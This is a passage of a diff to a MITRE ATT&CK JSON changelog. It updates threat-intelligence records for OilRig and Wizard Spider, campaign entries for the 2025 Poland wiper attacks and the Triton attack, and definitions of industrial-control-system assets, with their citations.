+                            "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
+                        },
+                        {
+                            "source_name": "IBM ZeroCleare Wiper December 2019",
+                            "description": "Kessem, L. (2019, December 4). New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East. Retrieved September 4, 2024.",
+                            "url": "https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/"
+                        },
+                        {
+                            "source_name": "Unit 42 QUADAGENT July 2018",
+                            "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/"
+                        },
+                        {
+                            "source_name": "Crowdstrike Helix Kitten Nov 2018",
+                            "description": "Meyers, A. (2018, November 27). Meet CrowdStrike\u2019s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.",
+                            "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Proofpoint Iranian Aligned Attacks JAN 2020",
+                            "description": "Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.",
+                            "url": "https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect"
+                        },
+                        {
+                            "source_name": "FireEye APT34 Dec 2017",
+                            "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+                        },
+                        {
+                            "source_name": "Secureworks COBALT GYPSY Threat Profile",
+                            "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy"
+                        },
+                        {
+                            "source_name": "Symantec Crambus OCT 2023",
+                            "description": "Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.",
+                            "url": "https://www.security.com/threat-intelligence/crambus-middle-east-government"
+                        },
+                        {
+                            "source_name": "APT34",
+                            "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)"
+                        },
+                        {
+                            "source_name": "Unit 42 Playbook Dec 2017",
+                            "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.",
+                            "url": "https://pan-unit42.github.io/playbook_viewer/"
+                        },
+                        {
+                            "source_name": "Unit42 OilRig Playbook 2023",
+                            "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.",
+                            "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Robert Falcone",
+                        "Bryan Lee",
+                        "Dragos Threat Intelligence",
+                        "Jaesang Oh, KC7 Foundation"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "5.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2025-01-16 18:55:49.463000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "5.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-12 18:15:29.396000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Wizard Spider",
+                    "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)",
+                    "aliases": [
+                        "Wizard Spider",
+                        "UNC1878",
+                        "TEMP.MixMaster",
+                        "Grim Spider",
+                        "FIN12",
+                        "GOLD BLACKBURN",
+                        "ITG23",
+                        "Periwinkle Tempest",
+                        "DEV-0193",
+                        "Pistachio Tempest",
+                        "DEV-0237"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0102",
+                            "external_id": "G0102"
+                        },
+                        {
+                            "source_name": "Grim Spider",
+                            "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)"
+                        },
+                        {
+                            "source_name": "UNC1878",
+                            "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)"
+                        },
+                        {
+                            "source_name": "TEMP.MixMaster",
+                            "description": "(Citation: FireEye Ryuk and Trickbot January 2019)"
+                        },
+                        {
+                            "source_name": "ITG23",
+                            "description": "(Citation: IBM X-Force ITG23 Oct 2021)"
+                        },
+                        {
+                            "source_name": "FIN12",
+                            "description": "(Citation: Mandiant FIN12 Oct 2021)"
+                        },
+                        {
+                            "source_name": "Periwinkle Tempest",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "DEV-0193",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "Pistachio Tempest",
+                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
+                        },
+                        {
+                            "source_name": "DEV-0237",
+                            "description": "(Citation: Microsoft_PistachioTempest_Jan2024)"
+                        },
+                        {
+                            "source_name": "GOLD BLACKBURN",
+                            "description": "(Citation: Secureworks Gold Blackburn Mar 2022)"
+                        },
+                        {
+                            "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020",
+                            "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.",
+                            "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a"
+                        },
+                        {
+                            "source_name": "FireEye Ryuk and Trickbot January 2019",
+                            "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html"
+                        },
+                        {
+                            "source_name": "CrowdStrike Ryuk January 2019",
+                            "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.",
+                            "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/"
+                        },
+                        {
+                            "source_name": "CrowdStrike Grim Spider May 2019",
+                            "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.",
+                            "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/"
+                        },
+                        {
+                            "source_name": "FireEye KEGTAP SINGLEMALT October 2020",
+                            "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Microsoft_PistachioTempest_Jan2024",
+                            "description": "Microsoft. (2024, January 25). Financially Motivated Threat Actor Pistachio Tempest. Retrieved December 15, 2025.",
+                            "url": "https://www.microsoft.com/en-us/security/security-insider/threat-landscape/pistachio-tempest"
+                        },
+                        {
+                            "source_name": "CrowdStrike Wizard Spider October 2020",
+                            "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.",
+                            "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/"
+                        },
+                        {
+                            "source_name": "Secureworks Gold Blackburn Mar 2022",
+                            "description": "Secureworks Counter Threat Unit. (2022, March 1). Gold Blackburn Threat Profile. Retrieved June 15, 2023.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/gold-blackburn"
+                        },
+                        {
+                            "source_name": "Mandiant FIN12 Oct 2021",
+                            "description": "Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.",
+                            "url": "https://web.archive.org/web/20220313061955/https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf"
+                        },
+                        {
+                            "source_name": "IBM X-Force ITG23 Oct 2021",
+                            "description": "Villadsen, O., et al. (2021, October 13). Trickbot Rising - Gang Doubles Down on Infection Efforts to Amass Network Footholds. Retrieved June 15, 2023.",
+                            "url": "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Edward Millington",
+                        "Oleksiy Gayda"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "4.1",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2026-01-20 16:26:04.859000+00:00\"}}}",
+                    "previous_version": "4.1"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "campaigns": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "campaign",
+                    "id": "campaign--a6aba167-5ada-4812-9da1-912c0e73335d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 19:33:22.532000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "2025 Poland Wiper Attacks",
+                    "description": "[2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063) is a Russian state-sponsored campaign that conducted destructive cyberattacks against Polish energy infrastructure in December 2025. Targets included more than 30 wind and photovoltaic farms, a combined heat and power (CHP) plant, and a manufacturing sector company. The attacks on the distributed energy resources (DER) disrupted communications between affected facilities and the distribution system operator, but did not impact electricity generation or heat supply. Across the campaign, threat actors deployed two previously undocumented wiper tools, [DynoWiper](https://attack.mitre.org/software/S9038), a Windows-based wiper and [LazyWiper](https://attack.mitre.org/software/S9039), a PowerShell wiper, distributed via malicious Group Policy Objects. At the CHP plant, threat actors had maintained access since at least March 2025, using that foothold to obtain credentials and move laterally before attempting wiper deployment. Some reporting has assessed the activity to be consistent with Russian Federal Security Service (FSB) threat activity group [Dragonfly](https://attack.mitre.org/groups/G0035), also tracked as STATIC TUNDRA, while other reporting attributes the destructive wiper activities to the Russian General Staff Main Intelligence Directorate (GRU) threat activity group ELECTRUM, also tracked as [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)(Citation: ESET DynoWiper JAN 2026)(Citation: ESET DynoWiper Update JAN 2026)",
+                    "aliases": [
+                        "2025 Poland Wiper Attacks",
+                        "2025 Poland Wiper Campaign"
+                    ],
+                    "first_seen": "2025-03-01 05:00:00+00:00",
+                    "last_seen": "2025-12-01 05:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0063",
+                            "external_id": "C0063"
+                        },
+                        {
+                            "source_name": "CERT Polska",
+                            "description": "CERT Polska. (2026, January 30). Energy Sector Incident  Report \u2013 29 December. Retrieved April 22, 2026.",
+                            "url": "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf"
+                        },
+                        {
+                            "source_name": "ESET DynoWiper Update JAN 2026",
+                            "description": "ESET. (2026, January 30). DynoWiper update: Technical analysis and attribution. Retrieved April 22, 2026.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/dynowiper-update-technical-analysis-attribution/"
+                        },
+                        {
+                            "source_name": "ESET DynoWiper JAN 2026",
+                            "description": "ESET. (2026, January 30). Russian Sandworm group attacks energy company in Poland with DynoWiper, ESET Research discovers. Retrieved April 22, 2026.",
+                            "url": "https://www.eset.com/us/about/newsroom/research/eset-research-russian-sandwormapt-attacks-energy-company-poland-with-dynowiper/"
+                        },
+                        {
+                            "source_name": "Dragos ELECTRUM JAN 2026",
+                            "description": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf. (2026, January). ELECTRUM: CYBER ATTACK ON POLAND\u2019S ELECTRIC SYSTEM 2025. Retrieved April 22, 2026.",
+                            "url": "https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
+                    "x_mitre_last_seen_citation": "(Citation: CERT Polska)(Citation: Dragos ELECTRUM JAN 2026)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"enterprise-attack\", \"ics-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 23:21:30.984000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "campaign",
+                    "id": "campaign--45a98f02-852f-49b2-94c0-c63207bebbbf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-25 17:47:37.619000+00:00",
+                    "modified": "2026-05-12 15:12:00.729000+00:00",
+                    "name": "Triton Safety Instrumented System Attack",
+                    "description": "[Triton Safety Instrumented System Attack](https://attack.mitre.org/campaigns/C0030) was a campaign employed by [TEMP.Veles](https://attack.mitre.org/groups/G0088) which leveraged the [Triton](https://attack.mitre.org/software/S1009) malware framework against a petrochemical organization.(Citation: Triton-EENews-2017) The malware and techniques used within this campaign targeted specific Triconex [Safety Controller](https://attack.mitre.org/assets/A0010)s within the environment.(Citation: FireEye TRITON 2018) The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.(Citation: FireEye TRITON 2017)\n",
+                    "aliases": [
+                        "Triton Safety Instrumented System Attack"
+                    ],
+                    "first_seen": "2017-06-01 04:00:00+00:00",
+                    "last_seen": "2017-08-01 04:00:00+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/campaigns/C0030",
+                            "external_id": "C0030"
+                        },
+                        {
+                            "source_name": "Triton-EENews-2017",
+                            "description": "Blake Sobczak. (2019, March 7). The inside story of the world\u2019s most dangerous malware. Retrieved March 25, 2024.",
+                            "url": "https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/"
+                        },
+                        {
+                            "source_name": "FireEye TRITON 2017",
+                            "description": "Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
+                        },
+                        {
+                            "source_name": "FireEye TRITON 2018",
+                            "description": "Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20200618231942/https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_first_seen_citation": "(Citation: Triton-EENews-2017)",
+                    "x_mitre_last_seen_citation": "(Citation: Triton-EENews-2017)",
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_domains']\": [\"ics-attack\", \"enterprise-attack\"]}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.729000+00:00\", \"old_value\": \"2026-04-23 00:24:57.457000+00:00\"}}}",
+                    "previous_version": "1.1"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "assets": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:58:00.982000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0008",
+                            "external_id": "A0008"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application Server",
+                    "description": "Application servers are used across many different sectors to host various diverse software applications necessary to supporting the ICS. Example functions can include data analytics and reporting, alarm management, and the management/coordination of different control servers.  The application server typically runs on a modern server operating system (e.g., MS Windows Server).",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "File Server",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Server designed to house files within the ICS environment and/or securely transfer files between the ICS and enterprise networks."
+                        },
+                        {
+                            "name": "License Server",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Vendor-specific server that operates and maintains application licenses for different ICS applications to prevent computers from reaching across the ICS/enterprise network boundary directly."
+                        },
+                        {
+                            "name": "Update / Patch Management Server",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Server capable of providing updates and/or patches to computers with general purpose operating systems (e.g. MS Windows or Linux) within the ICS environment to prevent computers from reaching across the ICS/enterprise network boundary directly."
+                        },
+                        {
+                            "name": "Domain Controller (DC)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "MS Windows server used for enforcing security policies and role-based access control (RBAC) rules and managing identity and access management (IAM) policies within a network."
+                        },
+                        {
+                            "name": "Database Server",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "MS Windows (primarily) server used for tracking long-term point information, control sheets, license information, trends, etc.  Paired with a Domain Controller and in some cases may be installed on the same machine functioning as a domain controller. MS SQL & Oracle are common types of database software found. "
+                        },
+                        {
+                            "name": "Alarm Collector",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Server that is a target of device/server alarms for a distributed system.  Some workstations or servers may have the job as the alarm collector and may only be a process/service running on the machine. "
+                        },
+                        {
+                            "name": "Asset Management Server",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A vendor-specific piece of software that collects information about vendor hardware or allows for configuration of that hardware (i.e., FactoryTalk Asset Center).  May also be known as: Field Device Management. "
+                        },
+                        {
+                            "name": "Telemetry Server",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Servers that collect Layer 2 communications or information and send via Layer 3 to other network segments or outside the control zone for collection (examples: PI Feeder, Remote Data Server).  "
+                        }
+                    ],
+                    "x_mitre_version": "2.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:58:00.982000+00:00\", \"old_value\": \"2023-09-28T14:58:00.982Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T01:01:24.568Z\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:55:39.339000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0007",
+                            "external_id": "A0007"
+                        },
+                        {
+                            "source_name": "Guidance - NIST SP800-82",
+                            "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.",
+                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Control Server",
+                    "description": "Control servers are typically a software platform that runs on a modern server operating system (e.g., MS Windows Server). The server typically uses one or more automation protocols (e.g., Modbus, DNP3) to communicate with the various low-level control devices such as Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs). The control server also usually provides an interface/network service to connect with an HMI.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Supervisory Control And Data Acquisition (SCADA) Server",
+                            "related_asset_sectors": [
+                                "General",
+                                "Electric",
+                                "Water and Wastewater"
+                            ],
+                            "description": "A SCADA server is used to perform monitoring and control across a distributed environment. It typically has an associated HMI to provide information to a human operator and heavily depends on the human operator to initiate control actions."
+                        },
+                        {
+                            "name": "Master Terminal Unit (MTU)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)"
+                        },
+                        {
+                            "name": "Supervisory Controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "*A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an ICS network* (Citation: Guidance - NIST SP800-82)"
+                        },
+                        {
+                            "name": "Distribution/Energy Management System (DMS/EMS)",
+                            "related_asset_sectors": [
+                                "Electric"
+                            ],
+                            "description": "A DMS and EMS are electric sector-specific systems that are commonly used to manage distribution and transmission-level electrical grids. These systems typically integrate a SCADA server and HMI with domain-specific data analysis applications, such as state-estimation and contingency analysis (EMS), or voltage-var control or fault restoration (DMS). These systems also maintain visibility (and in some cases control) through a variety of integrated and distributed automation systems. "
+                        },
+                        {
+                            "name": "Building Management / Automation System (BMS / BAS)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A controller (or set of controllers) that manages functionality for many common commercial / industrial buildings, such as heating, ventilation, and air conditioning (HVAC), lighting, elevators, etc."
+                        },
+                        {
+                            "name": "Manufacturing Execution System (MES)",
+                            "related_asset_sectors": [
+                                "Manufacturing"
+                            ],
+                            "description": "A controller that oversees the performance, efficiency, life cycle, and resourcing for a manufacturing process within the ICS environment at a facility. A MES may interact with an Enterprise Resource Planning (ERP) system in the business environment to coordinate resourcing and job planning."
+                        }
+                    ],
+                    "x_mitre_version": "2.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:55:39.339000+00:00\", \"old_value\": \"2023-09-28T14:55:39.339Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T01:04:14.767Z\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 15:01:48.509000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0009",
+                            "external_id": "A0009"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Data Gateway",
+                    "description": "Data Gateway is a device that supports the communication and exchange of data between different systems, networks, or protocols within the ICS. Different types of data gateways are used to perform various functions, including:\n\n *  <u>Protocol Translation:</u> Enable communication to devices that support different or incompatible protocols by translating information from one protocol to another. \n *  <u>Media Converter:</u> Convert data across different Layer 1 and 2 network protocols / mediums, for example, converting from Serial to Ethernet. \n *  <u>Data Aggregation:</u> Collect and combine data from different devices into one consistent format and protocol interface. \n*  <u>Data Mirroring:</u> Create a real-time, exact copy of data streams from devices to a separate destination for redundancy, monitoring, or backup purposes.\n\nData gateways are often critical to the forwarding/transmission of critical control or monitoring data within the ICS. Further, these devices often have remote various network services that are used to communicate across different zones or networks.  \n\nThese assets may focus on a single function listed below or combinations of these functions to best fit the industry use-case. \n",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows",
+                        "Linux",
+                        "Embedded",
+                        "Network"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Data Acquisition Server (DAS)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A Data Acquisition Server (DAS) a system or software platform that is used to collect, aggregate, and store data/telemetry from field devices using various SCADA/Automation protocols. "
+                        },
+                        {
+                            "name": "Serial to Ethernet Gateway",
+                            "related_asset_sectors": [
+                                "Electric",
+                                "General"
+                            ],
+                            "description": "A Serial to Ethernet gateway is a device that is used to connect field devices that only support serial-based communication (e.g., RS-232) with more modern Ethernet-based networks. "
+                        },
+                        {
